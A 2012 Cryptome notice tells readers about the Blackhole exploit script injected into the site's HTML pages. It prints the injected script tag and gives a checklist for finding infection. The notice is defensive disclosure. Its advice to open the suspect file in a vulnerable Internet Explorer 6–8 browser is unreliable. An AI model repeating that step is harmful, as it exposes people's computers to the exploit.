Donate for the Cryptome archive of files from June 1996 to the present

20 February 2012

Report the Blackhole Infection on a Computer

A sends:

"I've read that you recently been infected with the Blackhole Toolkit. I do not know what this means other than I have recently visited your site within that time frame ( Feb8. -Feb.12) with no "protection". Am I infected? What are the signs if I'm infected? Does visiting your site in that time period and your viewing it in IE7 mean you are now infected."

The Blackhole Exploit infection derived from Cryptome has been confirmed only by the initial report to Cryptome from a reader whose Norton security program reported the Blackhole Exploit program on a particular file.

Since that initial report there have been no reports to Cryptome, nor elsewhere as far as we know, that a computer has been infected by the Blackhole Exploit derived from a Cryptome file.

However, based on comments to Cryptome from security experts:

If an HTML file on Cryptome other than the home page (updated frequently) was accessed during the period, the file most likely contained the Blackhole Exploit script at the end of the underlying HTML code:

<SCRIPT src="/0002/afg/afg.php"></SCRIPT>

If the file was accessed with Microsoft Internet Explorer versions 6.0, 7.0 or 8.0, the script archived the browser's origin IP address to a sub-directory for covert retrieval by the attacker and likely used to infect those computers.

If you retained a Cryptome file from that period examine the underlying code of the file for the script line at the end of the code. (An HTML file can be opened with a text editor if you do not have an HTML editor.)

If the script line is present in the underlying code your computer may have been but not yet confirmed infected with the Blackhole Exploit program.

To check on Blackhole Exploit infection:

1. Run a good security protection program on your computer.

2. If the downloaded Cryptome file was retained scan the file with the security protection program.

3. Open the file in an IE 6, 7 or 8 browser to see if an infection is reported.

If the Blackhole Exploit is reported to be on your computer or in the file please let us know, with a screenshot of the report if possible: cryptome[at]earthlink.net